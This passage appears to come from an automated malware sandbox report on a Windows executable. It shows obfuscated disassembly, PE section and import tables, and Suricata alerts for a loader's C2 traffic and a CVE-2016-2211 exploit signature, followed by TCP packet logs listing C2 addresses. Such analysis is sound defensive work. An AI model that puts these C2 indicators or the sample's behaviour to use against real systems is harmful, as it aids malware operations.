                                                                                                                                            js 00007F8AB8BB0EF0h
                                                                                                                                            shl cx, 004Fh
                                                                                                                                            ror al, 1
                                                                                                                                            shl cx, 000Bh
                                                                                                                                            rol cl, FFFFFFC1h
                                                                                                                                            not al
                                                                                                                                            xor bl, al
                                                                                                                                            lea eax, dword ptr [esp+eax+10h]
                                                                                                                                            mov word ptr [ecx+eax], dx
                                                                                                                                            mov dword ptr [esp+ecx], esi
                                                                                                                                            retn 000Ch
                                                                                                                                            add al, A3h
                                                                                                                                            and dword ptr [esp+ecx+0Ch], EEB6FD83h
                                                                                                                                            xor al, ADh
                                                                                                                                            xor bl, al
                                                                                                                                            xor ecx, dword ptr [esp+ecx*2+0Ch]
                                                                                                                                            add byte ptr [esp+ecx*2-146BFFF2h], dl
                                                                                                                                            mov word ptr [ebp+ecx*2-146C0002h], ax
                                                                                                                                            mov dword ptr [esp+ecx-0A360000h], edx
                                                                                                                                            movsx eax, dx
                                                                                                                                            add dl, byte ptr [ebp+ecx-0A360002h]
                                                                                                                                            mov dword ptr [esp+ecx-0A35FFF8h], ecx
                                                                                                                                            add al, byte ptr [ebp+eax*8+00h]
                                                                                                                                            add dl, al
                                                                                                                                            not ecx
                                                                                                                                            call 00007F8AB8B5220Eh
                                                                                                                                            lea eax, dword ptr [esp+eax+0Ch]
                                                                                                                                            mov edx, dword ptr [esp+04h]

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x24e67880x154dVek
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x39a80000x428f17pxja
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1eb50000x98M1RF
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            Cqe3k0x10000x12685e0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            QnWKdM0x1280000x16a7cf60x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            kqUPd0x17d00000x6fc890x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            h4ls0x18400000x6749680x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            M1RF0x1eb50000xb500x10006272dcb8677031c69cad79505f092ff8False0.03271484375data0.23658523720879765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            dVek0x1eb60000x1af1b700x1af20002ab160e658ed0b695666fbcb1c715f5aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            7pxja0x39a80000x428f10x43000d0680ae9bb1b22a21260edb21bb20a15False0.21589319029850745data3.9741264951499495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_ICON0x39a81c40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.26344086021505375
                                                                                                                                            RT_ICON0x39a84ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.41216216216216217
                                                                                                                                            RT_ICON0x39a85d40x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2703360.2153519543154718
                                                                                                                                            RT_GROUP_ICON0x39ea5fc0x14data1.2
                                                                                                                                            RT_GROUP_ICON0x39ea6100x14dataChineseChina1.2
                                                                                                                                            RT_GROUP_ICON0x39ea6240x14dataChineseChina1.25
                                                                                                                                            RT_MANIFEST0x39ea6380x2b9XML 1.0 document, ASCII text, with very long lines (697), with no line terminators0.5279770444763271

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            WINMM.dllmidiOutUnprepareHeader
                                                                                                                                            WS2_32.dllrecvfrom
                                                                                                                                            RASAPI32.dllRasHangUpA
                                                                                                                                            KERNEL32.dllGetVersion, GetVersionExA
                                                                                                                                            USER32.dllGetActiveWindow
                                                                                                                                            GDI32.dllExtSelectClipRgn
                                                                                                                                            WINSPOOL.DRVOpenPrinterA
                                                                                                                                            ADVAPI32.dllSetSecurityDescriptorDacl
                                                                                                                                            SHELL32.dllShellExecuteA
                                                                                                                                            ole32.dllCoCreateInstance
                                                                                                                                            OLEAUT32.dllUnRegisterTypeLib
                                                                                                                                            COMCTL32.dll
                                                                                                                                            WININET.dllInternetCanonicalizeUrlA
                                                                                                                                            comdlg32.dllChooseColorA
                                                                                                                                            KERNEL32.dllGetSystemTimeAsFileTime
                                                                                                                                            KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, LoadLibraryA, GetModuleHandleA, GetProcAddress

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            ChineseChina

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-11-06T16:40:16.065171+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.1049763TCP
                                                                                                                                            2024-11-06T16:40:17.575368+01002051639ET MALWARE DaoDao Cloud Loader C2 Response1120.27.243.15332520192.168.2.1049776TCP
                                                                                                                                            2024-11-06T16:40:27.941781+01002851825ETPRO MALWARE Win32/Sogou.H Variant CnC Activity1192.168.2.1057267140.206.225.13680TCP
                                                                                                                                            2024-11-06T16:40:56.326888+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.1057357TCP
                                                                                                                                            2024-11-06T16:41:27.858250+01002051639ET MALWARE DaoDao Cloud Loader C2 Response1120.27.243.15332520192.168.2.1057358TCP
                                                                                                                                            2024-11-06T16:42:37.974668+01002051639ET MALWARE DaoDao Cloud Loader C2 Response1120.27.243.15332520192.168.2.1057359TCP
                                                                                                                                            2024-11-06T16:43:48.228709+01002051639ET MALWARE DaoDao Cloud Loader C2 Response1120.27.243.15332520192.168.2.1057360TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 6, 2024 16:40:15.600949049 CET4977632520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:40:15.606718063 CET3252049776120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:15.606815100 CET4977632520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:40:17.575367928 CET3252049776120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:17.625296116 CET4977632520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:40:17.630300999 CET3252049776120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:18.003388882 CET3252049776120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:18.050880909 CET4977632520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:40:18.201340914 CET5722253192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:18.206284046 CET53572221.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:18.206362963 CET5722253192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:18.211525917 CET53572221.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:18.794419050 CET5722253192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:18.799987078 CET53572221.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:18.800101042 CET5722253192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:21.411123037 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:21.415954113 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:21.416122913 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:21.416253090 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:21.422465086 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:22.406078100 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:22.406158924 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:22.407591105 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:22.412580013 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:22.717986107 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:22.718017101 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:22.718094110 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:22.718094110 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:22.724719048 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:22.729701996 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:23.042407990 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:23.042675018 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:23.043690920 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:23.048726082 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:23.354614973 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:23.354635954 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:23.354717970 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:23.354717970 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:23.357914925 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:23.362961054 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:23.725223064 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:23.725281000 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:23.726429939 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:23.731384039 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.036721945 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.036740065 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.036753893 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.036782980 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.036787987 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:24.036819935 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:24.036860943 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:24.057406902 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.057472944 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:24.059947014 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.060002089 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:26.287396908 CET5726380192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:26.292216063 CET8057263107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.292331934 CET5726380192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:26.325428963 CET5726380192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:26.330327988 CET8057263107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.849678040 CET5726780192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:26.854908943 CET8057267140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.855006933 CET5726780192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:26.855175018 CET5726780192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:26.860074043 CET8057267140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.200721025 CET5726880192.168.2.10112.64.218.154
                                                                                                                                            Nov 6, 2024 16:40:27.364645004 CET8057268112.64.218.154192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.364718914 CET5726880192.168.2.10112.64.218.154
                                                                                                                                            Nov 6, 2024 16:40:27.365211010 CET5726880192.168.2.10112.64.218.154
                                                                                                                                            Nov 6, 2024 16:40:27.370187044 CET8057268112.64.218.154192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.372586012 CET5726980192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:27.377481937 CET8057269116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.377549887 CET5726980192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:27.377793074 CET5726980192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:27.382642984 CET8057269116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.897969007 CET8057267140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.941781044 CET5726780192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:28.061156988 CET8057263107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.061285019 CET8057263107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.061297894 CET8057263107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.061309099 CET8057263107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.061359882 CET5726380192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:28.061387062 CET5726380192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:28.061609983 CET5726380192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:28.065299988 CET8057263107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.065596104 CET5726380192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:28.120946884 CET8057267140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.121074915 CET5726780192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:28.127023935 CET8057267140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.127080917 CET5726780192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:28.425626040 CET8057268112.64.218.154192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.425759077 CET8057268112.64.218.154192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.425942898 CET5726880192.168.2.10112.64.218.154
                                                                                                                                            Nov 6, 2024 16:40:28.491256952 CET5726880192.168.2.10112.64.218.154
                                                                                                                                            Nov 6, 2024 16:40:28.496325016 CET8057268112.64.218.154192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.582917929 CET8057269116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.583074093 CET5726980192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:28.587999105 CET5728080192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:28.588529110 CET8057269116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.588586092 CET5726980192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:28.592883110 CET8057280116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.592972040 CET5728080192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:28.593162060 CET5728080192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:28.598153114 CET8057280116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.598274946 CET8057280116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.847060919 CET8057268112.64.218.154192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.847425938 CET5726880192.168.2.10112.64.218.154
                                                                                                                                            Nov 6, 2024 16:40:28.853904963 CET8057268112.64.218.154192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.853996992 CET5726880192.168.2.10112.64.218.154
                                                                                                                                            Nov 6, 2024 16:40:28.875653982 CET5728180192.168.2.10116.132.219.22
                                                                                                                                            Nov 6, 2024 16:40:28.880562067 CET8057281116.132.219.22192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.880634069 CET5728180192.168.2.10116.132.219.22
                                                                                                                                            Nov 6, 2024 16:40:28.880817890 CET5728180192.168.2.10116.132.219.22
                                                                                                                                            Nov 6, 2024 16:40:28.885603905 CET8057281116.132.219.22192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:29.728199005 CET8057280116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:29.728413105 CET5728080192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:29.733593941 CET8057280116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:29.733752012 CET5728080192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:30.022303104 CET57286443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:30.022341967 CET44357286113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.022454977 CET57286443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:30.022912025 CET8057281116.132.219.22192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.031307936 CET57286443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:30.031330109 CET44357286113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.031397104 CET5728180192.168.2.10116.132.219.22
                                                                                                                                            Nov 6, 2024 16:40:30.036741018 CET8057281116.132.219.22192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.036801100 CET5728180192.168.2.10116.132.219.22
                                                                                                                                            Nov 6, 2024 16:40:30.370242119 CET57286443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:30.370690107 CET5729180192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:30.375929117 CET8057291140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.376013041 CET5729180192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:30.376255035 CET5729180192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:30.381246090 CET8057291140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.381391048 CET8057291140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.415334940 CET44357286113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.432409048 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:30.639553070 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.963033915 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:30.963251114 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:30.964068890 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:30.969434023 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.273690939 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.273721933 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.273736000 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.273753881 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.273788929 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:31.273816109 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:31.293301105 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.293556929 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:31.293925047 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.294008017 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:31.400017977 CET5729180192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:31.405677080 CET8057291140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.405740023 CET5729180192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:31.476824999 CET44357286113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.476895094 CET57286443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:31.476923943 CET57286443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:32.297010899 CET5730080192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:32.310440063 CET8057300107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.310528994 CET5730080192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:32.364953995 CET5730080192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:32.370769024 CET8057300107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.958360910 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:32.963270903 CET8057304140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.963468075 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:33.173594952 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:33.178744078 CET8057304140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.537075043 CET8057300107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.537321091 CET5730080192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:33.543230057 CET8057300107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.543297052 CET5730080192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:33.546324968 CET5730680192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:33.551559925 CET8057306116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.551637888 CET5730680192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:33.552021980 CET5730680192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:33.552225113 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:33.557157040 CET8057306116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.557220936 CET8057307116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.557334900 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:33.557415009 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:33.562376976 CET8057307116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.974281073 CET8057304140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.019596100 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:34.188267946 CET8057304140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.188642025 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:34.188885927 CET57312443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:34.188940048 CET4435731236.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.189030886 CET57312443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:34.194226027 CET8057304140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.194324017 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:34.223663092 CET57312443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:34.223684072 CET4435731236.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.683307886 CET8057306116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.683561087 CET5730680192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:34.689106941 CET8057306116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.689169884 CET5730680192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:34.697499037 CET8057307116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.697521925 CET8057307116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.697635889 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:34.806114912 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:34.806303024 CET5731780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:34.806432009 CET5731880192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:34.811043024 CET8057307116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.811265945 CET8057317116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.811340094 CET8057318140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.811347008 CET5731780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:34.811387062 CET5731880192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:34.811548948 CET5731780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:34.811568022 CET5731880192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:34.816577911 CET8057317116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.816592932 CET8057318140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:35.196080923 CET8057307116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:35.238368988 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:35.398740053 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:35.403985977 CET8057307116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:35.404068947 CET5730780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:36.059514999 CET8057317116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:36.061862946 CET5731780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:36.067672968 CET8057317116.132.218.191192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:36.067743063 CET5731780192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:36.395504951 CET5732680192.168.2.10116.132.219.22
                                                                                                                                            Nov 6, 2024 16:40:36.400482893 CET8057326116.132.219.22192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:36.400748014 CET5732680192.168.2.10116.132.219.22
                                                                                                                                            Nov 6, 2024 16:40:36.401091099 CET5732680192.168.2.10116.132.219.22
